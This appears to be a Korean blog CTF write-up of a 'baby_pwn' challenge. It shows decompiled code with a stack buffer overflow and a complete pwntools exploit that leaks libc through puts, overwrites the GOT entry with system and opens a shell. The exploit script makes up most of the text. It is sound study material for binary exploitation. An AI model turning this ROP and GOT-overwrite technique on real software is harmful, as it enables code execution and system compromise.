#1. 문제 살펴보기
#2. 문제 분석하기
< main >
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf; // [rsp+10h] [rbp-100h]
setvbuf(_bss_start, 0LL, 2, 0LL);
puts("What do you want me to echo back> ");
read(0, &buf, 0x256uLL);
puts(&buf);
return 0;
}
ROP !
#3. Exploit Code
from pwn import*
p = process('./baby_pwn')
# gadget
puts_plt = 0x401030
puts_got = 0x404018
read_plt = 0x401040
pop_rdi = 0x401223
pop_rsi_r15 = 0x401221
# exploit
pay = ''
pay += 'a'*0x100 # buf
pay += 'b'*0x8 # sfp
pay += p64(pop_rdi) # ret
pay += p64(puts_got)
pay += p64(puts_plt)
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(puts_got)
pay += p64(0)
pay += p64(read_plt)
pay += p64(pop_rdi)
pay += p64(puts_got+8)
pay += p64(puts_plt)
p.send(pay)
p.recvuntil('bbbbbbbb')
p.recv(0x4)
puts_libc = u64(p.recv(6).ljust(8,'\x00'))
print hex(puts_libc)
libc_base = puts_libc - 526784
system = libc_base + 324672
p.sendline(p64(system)+'/bin/sh\x00')
p.interactive()
'CTF Review' 카테고리의 다른 글
| [ stack ] Rooters CTF 2019 Secure ROP (0) | 2019.11.27 |
|---|---|
| [ heap ] Rooters CTF 2019 USER_ADMINISTRATION 미완 (0) | 2019.11.24 |
| [ heap ] Backdoorctf 2019 babytcache (0) | 2019.11.06 |
| [ stack ] BSidesSF 2019 CTF slowfire 미완성 (0) | 2019.11.04 |
| [ heap ] 0CTF 2019 baby_aegis (0) | 2019.10.31 |
